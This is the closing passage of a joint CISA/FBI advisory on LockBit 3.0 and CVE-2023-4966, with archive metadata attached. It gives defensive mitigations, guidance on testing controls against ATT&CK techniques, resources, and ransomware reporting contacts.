NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most\r\ncommon and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance\r\nGoals for more information on the CPGs, including additional recommended baseline protections.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 11 of 14\n\nIsolate NetScaler ADC and Gateway appliances for testing until patching is ready and deployable.\r\nSecure remote access tools by:\r\nImplement application controls to manage and control the execution of software, including allowlisting\r\nremote access programs. Application controls should prevent the installation and execution of portable\r\nversions of unauthorized remote access and other software. A properly configured application allowlisting\r\nsolution will block any unlisted application execution. Allowlisting is important because antivirus solutions\r\nmay fail to detect the execution of malicious portable executables when the files use any combination of\r\ncompression, encryption, or obfuscation.\r\nStrictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best\r\npractices, for example [CPG 2.W]:\r\nAudit the network for systems using RDP.\r\nClose unused RDP ports.\r\nEnforce account lockouts after a specified number of attempts.\r\nApply phishing-resistant multifactor authentication (MFA).\r\nLog RDP login attempts.\r\nRestrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis.\r\nTypically, only those users or administrators who manage the network or Windows operating systems (OSs) should\r\nbe permitted to use PowerShell [CPG 2.E].\r\nUpdate Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell\r\nversions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail\r\nto aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].\r\nEnable enhanced PowerShell logging [CPG 2.T, 2.U].\r\nPowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a\r\nthreat actor’s PowerShell use.\r\nEnsure PowerShell instances, using the latest version, have module, script block, and transcription logging\r\nenabled (enhanced logging).\r\nThe two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell\r\nOperational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention\r\nperiod of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data\r\nhas been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as\r\npossible.\r\nConfigure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations\r\nrequiring administrator privileges to reduce the risk of lateral movement by PsExec.\r\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a\r\nphysically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).\r\nRequire all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to\r\ncomply with NIST's standards for developing and managing password policies.\r\nUse longer passwords consisting of at least 15 characters [CPG 2.B].\r\nStore passwords in hashed format using industry-recognized password managers.\r\nAdd password user “salts” to shared login credentials.\r\nAvoid reusing passwords [CPG 2.C].\r\nImplement multiple failed login attempt account lockouts [CPG 2.G].\r\nDisable password “hints.\"\r\nRequire administrator credentials to install software.\r\nKeep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and\r\ncost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should\r\npatch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching\r\nknown exploited vulnerabilities in internet-facing systems [CPG 1.E].\r\nUpgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of\r\ncompromise.\r\nVALIDATE SECURITY CONTROLS\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 12 of 14\n\nIn addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security\r\nprogram against the threat behaviors mapped to the MITRE ATT\u0026CK for Enterprise framework in this advisory. CISA\r\nrecommends testing your existing security controls inventory to assess how they perform against the ATT\u0026CK techniques\r\ndescribed in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see Table 1).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. Tune your security program, including people, processes, and technologies, based on the data generated by this\r\nprocess.\r\nCISA and the authoring organizations recommend continually testing your security program, at scale, in a production\r\nenvironment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in this advisory.\r\nRESOURCES\r\nStopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources\r\nand alerts.\r\nThe Joint Ransomware Guide provides preparation, prevention, and mitigation best practices as well as a ransomware\r\nresponse checklist.\r\nCyber Hygiene Services and Ransomware Readiness Assessment provide no-cost cyber hygiene and ransomware\r\nreadiness assessment services.\r\nFor more resources to help aid in the mitigation of cyber threats and ransomware attacks visit Strategies to Mitigate\r\nCyber Security Incidents , Protect yourself from Ransomware , and How the ASD’s ACSC can help during a\r\nCyber Security Incident .\r\nREPORTING\r\nThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from\r\nforeign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information,\r\ndecryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment\r\ndoes not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional\r\norganizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.\r\nRegardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly\r\nreport ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA\r\nvia the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472).\r\nAustralian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD’s\r\nACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au .\r\nDISCLAIMER\r\nThe information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations\r\ndo not endorse any commercial entity, product, company, or service, including any entities, products, or services linked\r\nwithin this document. Any reference to specific commercial entities, products, processes, or services by service mark,\r\ntrademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and\r\nthe authoring organizations.\r\nACKNOWLEDGEMENTS\r\nBoeing contributed to this CSA.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 13 of 14\n\nREFERENCES\r\n[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966\r\n[2] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)\r\n[3] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966 )\r\nVERSION HISTORY\r\nNovember 21, 2023: Initial version.\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
	],
	"report_names": [
		"aa23-325a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434730,
	"ts_updated_at": 1775826711,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9.pdf",
		"text": "https://archive.orkl.eu/4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9.txt",
		"img": "https://archive.orkl.eu/4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9.jpg"
	}
}